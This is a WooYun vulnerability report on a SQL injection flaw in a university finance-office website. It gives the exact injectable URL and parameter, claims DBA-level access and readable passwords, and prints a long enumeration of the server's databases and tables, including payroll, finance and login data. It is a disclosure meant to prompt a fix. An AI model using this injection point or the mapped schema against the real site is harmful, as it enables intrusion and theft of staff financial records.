乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-02: 细节已通知厂商并且等待厂商处理中 2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开
博学厚德 尚美健行
注入点:
http://cwc.synu.edu.cn/website/secondPages/secondIndex.jsp?i=0&ItemIdType=null&parentItemId=77
具有DBA权限:
可直接查看数据库用户密码:
数据库:
Database: tempdb[2 tables]+--------------------------------------------+| sysconstraints || syssegments |+--------------------------------------------+Database: data[6 tables]+--------------------------------------------+| OTHER_INCOME_INFO || SYS_HS_COVER_TWO || SYS_HS_SALARY_GATHER_TEMP || dtproperties || sysconstraints || syssegments |+--------------------------------------------+Database: msdb[82 tables]+--------------------------------------------+| RTblClassDefs || RTblDBMProps || RTblDBXProps || RTblDTMProps || RTblDTSProps || RTblDatabaseVersion || RTblEQMProps || RTblEnumerationDef || RTblEnumerationValueDef || RTblGENProps || RTblIfaceDefs || RTblIfaceHier || RTblIfaceMem || RTblMDSProps || RTblNamedObj || RTblOLPProps || RTblParameterDef || RTblPropDefs || RTblProps || RTblRelColDefs || RTblRelshipDefs || RTblRelshipProps || RTblRelships || RTblSIMProps || RTblScriptDefs || RTblSites || RTblSumInfo || RTblTFMProps || RTblTypeInfo || RTblTypeLibs || RTblUMLProps || RTblUMXProps || RTblVersionAdminInfo || RTblVersions || RTblWorkspaceItems || backupfile || backupmediafamily || backupmediaset || backupset || log_shipping_databases || log_shipping_monitor || log_shipping_plan_databases || log_shipping_plan_history || log_shipping_plans || log_shipping_primaries || log_shipping_secondaries || logmarkhistory || mswebtasks || restorefilegroup || restorefilegroup || restorehistory || sqlagent_info || sysalerts || syscachedcredentials || syscategories || sysconstraints || sysdbmaintplan_databases || sysdbmaintplan_history || sysdbmaintplan_jobs || sysdbmaintplans || sysdownloadlist || sysdtscategories || sysdtspackagelog || sysdtspackages || sysdtssteplog || sysdtstasklog || sysjobhistory || sysjobs_view || sysjobs_view || sysjobschedules || sysjobservers || sysjobsteps || sysnotifications || sysoperators || syssegments || systargetservergroupmembers || systargetservergroups || systargetservers_view || systargetservers_view || systaskids || systasks_view || systasks_view |+--------------------------------------------+Database: cwzhcx[73 tables]+--------------------------------------------+| GZ_GRSDS_TMP || GZ_GRSDS_TMP || GZ_XMDM || GZ_YLBT_TMP || GZ_YLBT_TMP || GZ_ZFBT_TMP || GZ_ZFBT_TMP || GZ_ZFGJJ_TMP || GZ_ZFGJJ_TMP || PBMDM_TMP || PBMDM_TMP || PBMXZDM_TMP || PBMXZDM_TMP || PGNDM || PQUERY_FIELD || PQUERY_FIELD || PQUERY_TJ || PSCWJDY || PXMLXDM_TMP || PXMLXDM_TMP || PXSDM_TMP || PXSDM_TMP || PXSZC || PXTCS || PYHBMQX || PYHDM || PYHGNQX || PYHXMLXQX || PZGDM_TMP || PZGDM_TMP || PZGZC || SF_DXJFFZZ_TMP || SF_DXJFFZZ_TMP || SF_EXPORT_LM || SF_IMPORT_LM || SF_JMMXZ_TMP || SF_JMMXZ_TMP || SF_SFMXZ_TMP || SF_SFMXZ_TMP || SF_TFMXZ_TMP || SF_TFMXZ_TMP || SF_ZJFFZZ_TMP || SF_ZJFFZZ_TMP || SF_ZZ_TMP || SF_ZZ_TMP || XM_MXZ_TMP || XM_MXZ_TMP || XS_EXPORT || XS_IMPORT || ZCFG || ZW_FZJE_TMP || ZW_FZJE_TMP || ZW_KMJE_TMP || ZW_KMJE_TMP || ZW_KMNCS_TMP || ZW_KMNCS_TMP || ZW_MXZ_TMP || ZW_MXZ_TMP || ZW_WLZFK_TMP || ZW_WLZFK_TMP || ZW_XMCXZCB || ZW_XMJE_TMP || ZW_XMJE_TMP || ZW_XMNCS_TMP || ZW_XMNCS_TMP || ZW_XMSCFZR || ZW_XMSCFZR || ZW_XMSCXMLX || dtproperties || pyhkmqx || pyhxmqx || sysconstraints || syssegments |+--------------------------------------------+Database: pubs[14 tables]+--------------------------------------------+| authors || discounts || employee || jobs || pub_info || publishers || roysched || sales || stores || sysconstraints || syssegments || titleauthor || titles || titleview |+--------------------------------------------+Database: gxzhcx3[219 tables]+--------------------------------------------+| 111 || BZJ_FFMX_TEMP || BZJ_FFMX_TEMP || BZJ_FFZZ_TEMP || BZJ_FFZZ_TEMP || D99_CMD || D99_Tmp || DM_HS_DEPT || DXJ_HDD_TEMP || DXJ_HDD_TEMP || DXJ_JM_TEMP || DXJ_JM_TEMP || DXJ_MX_TEMP || DXJ_MX_TEMP || DXJ_ZZ_TEMP || DXJ_ZZ_TEMP || GL_LKDJ || GL_PJDJ || GL_PJHPDJ || GL_PJSFSDM || GL_PPJLX || GZ_BBZDDY_TEMP || GZ_BBZDDY_TEMP || GZ_BCGJJ_TEMP || GZ_BCGJJ_TEMP || GZ_BMDM_TEMP || GZ_BMDM_TEMP || GZ_FADM_TEMP || GZ_FADM_TEMP || GZ_GJJ_TEMP || GZ_GJJ_TEMP || GZ_GRSDS_TEMP || GZ_GRSDS_TEMP || GZ_GXSSB_TEMP || GZ_GXSSB_TEMP || GZ_QTSRMX_TEMP || GZ_QTSRMX_TEMP || GZ_XMDM_TEMP || GZ_XMDM_TEMP || GZ_ZGDM_TEMP || GZ_ZGDM_TEMP || OTHER_INCOME_INFO_BACKUP || OTHER_INCOME_INFO_BACKUP || PEXPORT_LM || PEXPORT_LM || PFBWD || PGNDM || PGROUP || PGZCXFA || PGZTLM || PGZTYYFA || PIMPORT_LM || PIMPORT_LM || PKMFL || PKMLBDM || PLBDM || PMENUQX_XM || PMENUQX_XM || PMENU_XM || PMENU_XM || PQUERY_FIELD || PQUERY_FIELD || PQUERY_TJ || PSCWJDY || PXMZC || PXSZC || PXTCS || PYHBMQX || PYHDM || PYHGNQX || PYHKMLBQX || PYHKMQX || PYHXMLXQX || PYHXMQX || PZGZC || REPORT_HS_DOWN_TEMPLATE || REPORT_HS_PRINT_LIMIT || REPORT_HS_UP_FILE || SYS_ADD_SALARY_DATECONFIG || SYS_CONSULT_DEPT || SYS_HS_CHECK_SALARYID_RESULT || SYS_HS_CHECK_STATE || SYS_HS_COVER_FOUR_BACKUP || SYS_HS_COVER_FOUR_BACKUP || SYS_HS_COVER_TWO_BACKUP || SYS_HS_COVER_TWO_BACKUP || SYS_HS_CURENTACT || SYS_HS_CUR_MONTH_CHECK || SYS_HS_FI_DEPT_DUTY || SYS_HS_FUNCTION || SYS_HS_OPER_LOG || SYS_HS_ROLE_FUNCTION || SYS_HS_ROLE_FUNCTION || SYS_HS_SALARYID_CHANGE_INFO || SYS_HS_SALARY_GATHER_BACKUP || SYS_HS_SALARY_GATHER_BACKUP || SYS_HS_SALARY_GATHER_TEMP_BACKUP || SYS_HS_SALARY_GATHER_TEMP_BACKUP || SYS_HS_SENDBACK_REASON || SYS_HS_UP_DATE_CONFIG || SYS_HS_UP_PER_INFO_TEMP || SYS_HS_UP_PER_INFO_TEMP || SYS_HS_VACATION_CONFIG || SYS_HS_VER_SALARYID || SYS_HS_WINDOW_INFO || SYS_HS_WORKFLOW_STEP || SYS_RT_EXPORT_DBASE3 || SYS_RT_TEMP_SALARY_GATHER || V_CHECK_WCOMPLETE || V_CHECK_WIN_DEPT || V_CHECK_WSHOULD || V_DEPT_UP_PER_INFO || V_OPER_LOG || V_PER_INFO_TYPE || V_ROLE_FUNCTION_QUERY || V_ROLE_FUNCTION_QUERY || V_WINDOW_GATHER || V_WINDOW_PER_INFO || XS_BMDM_TEMP || XS_BMDM_TEMP || XS_JMMXZ_TEMP || XS_JMMXZ_TEMP || XS_PBJDM_TEMP || XS_PBJDM_TEMP || XS_PSFQJ_TEMP || XS_PSFQJ_TEMP || XS_PSFXM_TEMP || XS_PSFXM_TEMP || XS_PXSDM_TEMP || XS_PXSDM_TEMP || XS_PXSLY_TEMP || XS_PXSLY_TEMP || XS_PXSXZ_TEMP || XS_PXSXZ_TEMP || XS_PXSZT_TEMP || XS_PXSZT_TEMP || XS_PZYDM_TEMP || XS_PZYDM_TEMP || XS_SFMXZ_TEMP || XS_SFMXZ_TEMP || XS_SFZZ_TEMP || XS_SFZZ_TEMP || XS_TFMXZ_TEMP || XS_TFMXZ_TEMP || ZW_BMDM_TEMP || ZW_BMDM_TEMP || ZW_BMXZ_TEMP || ZW_BMXZ_TEMP || ZW_FZJE_TEMP || ZW_FZJE_TEMP || ZW_KMDM_TEMP || ZW_KMDM_TEMP || ZW_KMJE_TEMP || ZW_KMJE_TEMP || ZW_MXZ_TEMP || ZW_MXZ_TEMP || ZW_WLZFK_TEMP || ZW_WLZFK_TEMP || ZW_XMDM_TEMP || ZW_XMDM_TEMP || ZW_XMEDKZLR || ZW_XMEDKZLR || ZW_XMEDZCKM || ZW_XMEDZD || ZW_XMJE_TEMP || ZW_XMJE_TEMP || ZW_XMLX_TEMP || ZW_XMLX_TEMP || ZW_XMMXZ_TEMP || ZW_XMMXZ_TEMP || ZW_XMSCFZR || ZW_XMSCFZR || ZW_XMSCXMLX || Zw_xmedzeddz || Zw_xmedzkz || Zw_xmedzzd || a || comd_list || dtproperties || gz_ffb_01 || gz_ffb_02 || gz_ffb_03 || gz_ffb_04 || gz_ffb_05 || gz_ffb_06 || gz_ffb_99 || gz_ffpc || help1 || help1 || p000000000000000000000000000 || p000000000000000000000000000 || pan || pan || pyhsfxmqx || pyhxsxzqx || sds_sysxmdm_show || sms_boxreceived || sms_boxsendedfail || sms_boxsendedfail || sms_boxsending || sms_chargeinfo || sms_feedbackconfig || sms_metone_reginfo || sms_module2mobile || sms_mt_param_ref || sms_regmobile || sms_sendconfig || sms_sysconfig || sms_thread_info || sysconstraints || syssegments || tmp || xs_zyffb || zw_wyls || zw_xmedkzmxz || zwxmfzr || zwyhtzgl || zwyhtzlx || zwyhtzyh |+--------------------------------------------+Database: master[37 tables]+--------------------------------------------+| INFORMATION_SCHEMA.CHECK_CONSTRAINTS || INFORMATION_SCHEMA.COLUMNS || INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE || INFORMATION_SCHEMA.COLUMN_PRIVILEGES || INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE || INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE || INFORMATION_SCHEMA.DOMAINS || INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS || INFORMATION_SCHEMA.KEY_COLUMN_USAGE || INFORMATION_SCHEMA.PARAMETERS || INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS || INFORMATION_SCHEMA.ROUTINES || INFORMATION_SCHEMA.ROUTINE_COLUMNS || INFORMATION_SCHEMA.SCHEMATA || INFORMATION_SCHEMA.TABLES || INFORMATION_SCHEMA.TABLE_CONSTRAINTS || INFORMATION_SCHEMA.TABLE_PRIVILEGES || INFORMATION_SCHEMA.VIEWS || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE || INFORMATION_SCHEMA.VIEW_TABLE_USAGE || MSreplication_options || dtproperties || spt_datatype_info_ext || spt_datatype_info_ext || spt_fallback_db || spt_fallback_dev || spt_fallback_usg || spt_monitor || spt_provider_types || spt_server_info || spt_values || sysconstraints || syslogins || sysoledbusers || sysopentapes || sysremotelogins || syssegments |+--------------------------------------------+Database: model[2 tables]+--------------------------------------------+| sysconstraints || syssegments |+--------------------------------------------+Database: synufinance[85 tables]+--------------------------------------------+| DKY_BASE_CONDITION || DKY_BUGET_SPEND || DKY_COLLEGE_INFO || DKY_CONTENT_EXPECT || DKY_CREATE_NEWREWARD_CONF || DKY_FINISH_APPLY || DKY_FINISH_FUND || DKY_FINISH_MEMBERS || DKY_FINISH_RESULT || DKY_FINISH_STATEMENT || DKY_FUNDAPPLY_STATEMENT || DKY_FUND_APPLY_APPENDIX || DKY_FUND_APPLY_APPENDIX || DKY_LOGIN || DKY_NEWS_APPENDIX || DKY_NEWS_INFO || DKY_NEWS_PICTURE || DKY_NODE || DKY_PROJECT_FUND || DKY_PROJECT_MEANING || DKY_PROJECT_MEMBERS || DKY_PUBLIC_CODE || DKY_REWARDAPPLY_STATEMENT_bak || DKY_REWARDAPPLY_STATEMENT_bak || DKY_REWARD_APPLY || DKY_REWARD_DATE_CONF || DKY_RIGHT || DKY_ROLE_RIGHT || DKY_ROLE_TYPE || DKY_TIME_CONFIG || HOPE_LINK_URL || SYS_ADMINE_APPENDIX || SYS_ADMIRE_INFO || SYS_ALL_ADMIRE_INFO || SYS_ALL_SCORE_LINE_INFO || SYS_ALL_SPECIAL_ADMISSIONS || SYS_COLLEGE_INFO || SYS_COLLEGE_SPECIAL_INFO || SYS_CONSULT_DEPT || SYS_CONSULT_INFO || SYS_CONSULT_SIGN_INFO || SYS_DICT_DEPARTMENT || SYS_DICT_STAFF_OWN_PRIV || SYS_DICT_STAFF_OWN_PRIV || SYS_DISPLAY_TEMPLATE || SYS_FUNCTION_PRIVATE || SYS_ITEM_INFO || SYS_NEWS_APPENDIX || SYS_NEWS_INFO || SYS_NEWS_PICTURE || SYS_NEWS_PUBLIC_POSITION || SYS_SCORE_INFO || SYS_SCORE_LINE_APPENDIX || V_2009TEMP_FINISHED || V_ALL_FINISHAPPLY_INFO || V_ALL_FUND_APPLY_INFO || V_ALL_REWARD_INFO || V_DKY_ROLE_RIGHT || V_PICTURE_NEWS_INFO || V_STU_FINISH_LIST || V_TOPIC_INFO || database || dtproperties || sysconstraints || syssegments || v_ALL_SCORE_LINE_INFO || v_admire_state_info || v_admission_info || v_all_admire_info || v_all_special_admire_info || v_college_special_info || v_college_sqecial_info || v_college_staff_info || v_depart_coll_staff_info || v_depart_staff_info || v_item_info || v_item_news_info || v_item_own_news_info || v_item_public_news_info || v_parentownitem_news_info || v_private_info || v_score_line_info || v_staff_own_priv || v_sys_news_info1 || v_sys_news_info1 |+--------------------------------------------+Database: Northwind[31 tables]+--------------------------------------------+| Categories || CustomerCustomerDemo || CustomerDemographics || Customers || EmployeeTerritories || Employees || Invoices || Region || Shippers || Suppliers || Territories || Alphabetical list of products || Category Sales for 1997 || Current Product List || Customer and Suppliers by City || Order Details Extended || Order Details Extended || Order Subtotals || Orders Qry || Orders Qry || Product Sales for 1997 || Products Above Average Price || Products Above Average Price || Products by Category || Quarterly Orders || Sales Totals by Amount || Sales by Category || Summary of Sales by Quarter || Summary of Sales by Year || sysconstraints || syssegments |+--------------------------------------------+
点到为止,不继续深入。
过滤希望学校的网站越来越安全!
危害等级:无影响厂商忽略
忽略时间:2016-05-09 09:00
漏洞Rank:4 (WooYun评价)
暂无
